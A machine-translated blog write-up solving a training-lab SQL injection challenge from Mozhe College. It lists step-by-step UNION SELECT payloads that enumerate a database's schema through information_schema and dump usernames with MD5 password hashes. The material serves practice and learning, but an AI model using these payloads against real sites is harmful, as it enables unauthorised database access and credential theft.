当前位置:网站首页>Mozi college SQL injection solution
Mozi college SQL injection solution
2020-11-08 09:40:00 【osc_7bgz0no1】
One · Judgment injection
Input id=1, Normal return . Input id=-1 Returns an error . from This shows that there is injection .
Two · Judgment fields
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 An error at this time , The description has four fields
3、 ... and · Use union Query injection point
Input union select 1,2,3,4
Find out 2,3 For the obvious note point
Four · Use database() Chaku name
Input union select 1,database(),3,4
Find out the name of the library mozhe_Discuz_StormGroup
5、 ... and · Look up the name of the table
Input
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
Query to StormGroup_member,notice
See member, So doubt about the first one . So first look up the first .
6、 ... and · Inquire about StormGroup_member The fields stored in the
Input
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
Query out id,name,password,status
7、 ... and · Query password and user name
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
obtain md5 Encrypted value . To decrypt , Get the code .
If the password is wrong , adopt limit m,n To continue with the inquiry .
8、 ... and · Submit key
After getting the password, you can see key, Copy , Submit .
版权声明
本文为[osc_7bgz0no1]所创,转载请带上原文链接,感谢
边栏推荐
- scala 中 Future 的简单使用
- NOIP 2012 提高组 复赛 第一天 第二题 国王游戏 game 数学推导 AC代码(高精度 低精度 乘 除 比较)+60代码(long long)+20分代码(全排列+深搜dfs)
- Basic concepts of computer network (5) basic principles of local area network
- PCIe enumeration process
- Python3.9的7个特性
- Mate 40系列发布 搭载华为运动健康服务带来健康数字生活
- FORTRAN 77 reads some data from the file and uses the heron iteration formula to solve the problem
- PX4添加新的应用
- 麦格理银行借助DataStax Enterprise (DSE) 驱动数字化转型
- IQKeyboardManager 源代码看看
猜你喜欢

M 端软件产品设计思虑札记 - 知乎

python学习 day1——基础学习

SQL Server 2008R2 18456错误解决方案

Seven features of Python 3.9

2020-11-05

Function periodic table filter value selectedvalue

Cloud alibabab notes come out, the whole network detailed explanation only this one hand is slow

Japan PSE certification
![[original] about the abnormal situation of high version poi autosizecolumn method](/img/3b/00bc81122d330c9d59909994e61027.jpg)
[original] about the abnormal situation of high version poi autosizecolumn method

ulab 1.0.0发布
随机推荐
架构师(2020年11月)
洞察——风格注意力网络(SANet)在任意风格迁移中的应用
Windows下子系统Ubuntu安装
ASP.NET MVC下基于异常处理的完整解决方案
FORTRAN 77 reads some data from the file and uses the heron iteration formula to solve the problem
Cloud Alibabab笔记问世,全网详解仅此一份手慢无
我们采访了阿里云云数据库SQL Server的产品经理,他说了解这四个问题就可以了...
Simple use of future in Scala
sed之查找替换
Rust: command line parameter and environment variable operation
[summary series] technical system of Internet server: high performance database index
M 端软件产品设计思虑札记 - 知乎
python学习 day1——基础学习
laravel8更新之速率限制改进
Oschina plays on Sunday - before that, I always thought I was a
蓝牙2.4G产品日本MIC认证的测试要求
2020-11-05
解决RabbitMQ消息丢失与重复消费问题
高并发,你真的理解透彻了吗?
Spotify是如何推动数据驱动决策的?